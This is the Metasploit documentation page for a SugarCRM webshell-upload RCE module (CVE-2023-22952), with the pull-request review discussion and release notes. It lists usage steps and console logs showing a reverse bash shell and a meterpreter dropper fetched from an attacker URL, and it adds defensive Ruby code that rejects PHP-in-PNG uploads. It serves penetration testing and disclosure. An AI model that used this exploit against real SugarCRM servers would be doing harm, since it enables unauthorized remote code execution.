metasploit-framework
SugarCRM webshell upload RCE [CVE-2023-22952]
This module exploits a Remote Code Execution vulnerability that has been identified in the SugarCRM application.
Using a specially crafted request, custom PHP code can be uploaded embedded in a PNG file and injected through the EmailTemplates because of missing input validation.
Any user, regardless of privileges, can exploit this vulnerability, and it results in access to the underlying operating system with the same privileges under which the web services run (typically user www-data).
SugarCRM 11.0 Professional, Enterprise, Ultimate, Sell and Serve versions 11.0.4 and below are affected. Fixed in release 11.0.5.
SugarCRM 12.0 Enterprise, Sell and Serve versions 12.0.1 and below are affected. Fixed in release 12.0.2.
Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/sugarcrm_webshell_cve_2023_22952`
- [ ] `set LHOST` with target IP
- [ ] `set LPORT` with target port
- [ ] `set TARGET` with `0` (UNIX cmd) or `1` (Linux Dropper)
- [ ] `exploit`
You should get a reverse bash shell or meterpreter session depending on the target setting.
Reverse Bash shell

```
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending authentication request.
[*] Uploading webshell and retrieving SugarCRM version.
[+] The target is vulnerable. SugarCRM version: 11.0.4 ENT
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted RPXrYGLCvGjL.phar
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:52584) at 2023-01-19 19:14:56 +0000

whoami
www-data
exit
```
Linux Meterpreter session

```
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending authentication request.
[*] Uploading webshell and retrieving SugarCRM version.
[+] The target is vulnerable. SugarCRM version: 11.0.4 ENT
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.100.254:8080/aLYDt2
[*] Client 127.0.0.1 (Wget/1.16 (linux-gnu)) requested /aLYDt2
[*] Sending payload to 127.0.0.1 (Wget/1.16 (linux-gnu))
[*] Sending stage (3045348 bytes) to 127.0.0.1
[+] Deleted ZxGTSVGsOUZs.phtml
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:43076) at 2023-01-19 19:16:07 +0000
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : sugarcrm
OS           : Debian 8.6 (Linux 2.6.32)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter > exit
```
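As an added example (not the module's code and not SugarCRM's), the kind of input validation the description says is missing on the upload path: a Ruby check that parses the PNG chunk structure, verifies CRCs, rejects anything after IEND, rejects non-image extensions like the `.phar`/`.phtml` names seen in the output above, and flags any chunk carrying a PHP open tag. It assumes uploads arrive as a filename plus raw bytes and that only `.png` is accepted; the `build_png` helper constructs a 1x1 test image so the check can be exercised offline.

```ruby
require 'zlib'

PNG_SIGNATURE = "\x89PNG\r\n\x1a\n".b
ALLOWED_EXTENSIONS = %w[.png].freeze
PHP_TAG = /<\?(?:php|=)/i # PHP open tags, matched case-insensitively

# Parses the PNG chunk list and checks every CRC. Returns [[type, data], ...]
# or raises ArgumentError for anything that is not a well-formed PNG.
def png_chunks(bytes)
  bytes = bytes.b
  raise ArgumentError, 'bad signature' unless bytes.start_with?(PNG_SIGNATURE)
  pos = PNG_SIGNATURE.bytesize
  chunks = []
  while pos < bytes.bytesize
    length = bytes[pos, 4].unpack1('N')
    type, data = bytes[pos + 4, 4], bytes[pos + 8, length.to_i]
    raise ArgumentError, 'truncated chunk' if length.nil? || data.nil? || data.bytesize != length
    raise ArgumentError, "bad CRC in #{type}" unless bytes[pos + 8 + length, 4]&.unpack1('N') == Zlib.crc32(type + data)
    chunks << [type, data]
    pos += 12 + length
    break if type == 'IEND'
  end
  raise ArgumentError, 'missing IEND' unless chunks.last&.first == 'IEND'
  raise ArgumentError, 'trailing data after IEND' if pos != bytes.bytesize
  chunks
end

# Returns [:ok] or [:reject, reason]. Rejects non-image extensions (such as the
# .phar/.phtml names visible in the module output), malformed PNGs, bytes
# appended after IEND, and any chunk whose payload carries a PHP open tag.
def validate_image_upload(filename, bytes)
  ext = File.extname(filename).downcase
  return [:reject, "extension #{ext.inspect} not allowed"] unless ALLOWED_EXTENSIONS.include?(ext)
  tainted = png_chunks(bytes).find { |_type, data| PHP_TAG.match?(data) }
  tainted ? [:reject, "PHP tag in #{tainted.first} chunk"] : [:ok]
rescue ArgumentError => e
  [:reject, "not a valid PNG: #{e.message}"]
end

# Builds a constructed 1x1 RGB PNG for testing; `extra` chunks go after IHDR,
# which is where a polyglot upload would tuck a PHP payload (e.g. in tEXt).
def build_png(extra = [])
  chunk = ->(type, data) { [data.bytesize].pack('N') + type + data + [Zlib.crc32(type + data)].pack('N') }
  ihdr = [1, 1, 8, 2, 0, 0, 0].pack('NNCCCCC') # 1x1, 8-bit depth, RGB
  idat = Zlib::Deflate.deflate("\x00\x00\x00\x00".b) # one row: filter byte + RGB
  PNG_SIGNATURE + chunk.('IHDR', ihdr) + extra.map { |t, d| chunk.(t, d) }.join +
    chunk.('IDAT', idat) + chunk.('IEND', '')
end
```

Serving uploads from a directory where PHP is not executed remains the stronger control; this check only keeps the PHP-in-PNG pattern from being stored under an executable name in the first place.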
You're on a roll with these things :smile: thanks.
h00die(s) are relentless machines.
Thanks, have some other nice ones lined up in the pipeline ;-)
Ready for review. Already uploaded the pcap files.
Gents, it is not moving. Is there anything that you still need from my side? pcap files were already uploaded a while ago and I tried to address the latest comments.
@h00die-gr3y Reviewed new updates and everything looks good, made one comment though on something that could be fixed for clarity over at https://github.com/rapid7/metasploit-framework/commit/3832b0522670228c9e12ec4f556192330e8eaf28#r100597164 (GitHub doesn't seem to think this is part of this review so sorry for the odd placement) but otherwise nothing looked off 👍
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be run from the root directory of Metasploit:

```
rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>
```

You can automate most of these changes with the -a flag:

```
rubocop -a <directory or file>
```

Please update your branch after these have been made, and reach out if you have any problems.
@h00die-gr3y Getting this error on the backend, think you're going to have to add ChunkyPNG as a Gem to Gemfile.lock, the existing file in the Metasploit root, for Bundler to understand that we are adding a new Gem.

```
You are trying to install in deployment mode after changing
your Gemfile. Run `bundle install` elsewhere and add the
updated Gemfile.lock to version control.

If this is a development machine, remove the
/*redacted*/metasploit-framework/Gemfile freeze
by running `bundle config unset deployment`.

The gemspecs for path gems changed
```
Added a few commits to fix some issues I found when reviewing this and left 3 review comments I'd like some feedback on. Most of this looks good now. Also rebased since this was quite behind the latest updates on the main branch.
@gwillcox-r7, Typically a sales guy will contact you. Products do not get assigned automatically.
@h00die-gr3y Alright is there any chance then that you could send an updated PCAP capture (believe you sent one a while back), to confirm the new changes work as expected? I can then compare that to the existing module and we can land this if all looks good.
Latest PCAP files are sent.
Rebased to squash commits, will land once tests pass.
Release Notes
A module has been added which exploits CVE-2023-22952, an RCE vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2. Successful exploitation as an unauthenticated attacker will result in remote code execution as the user running the web services, which is typically www-data.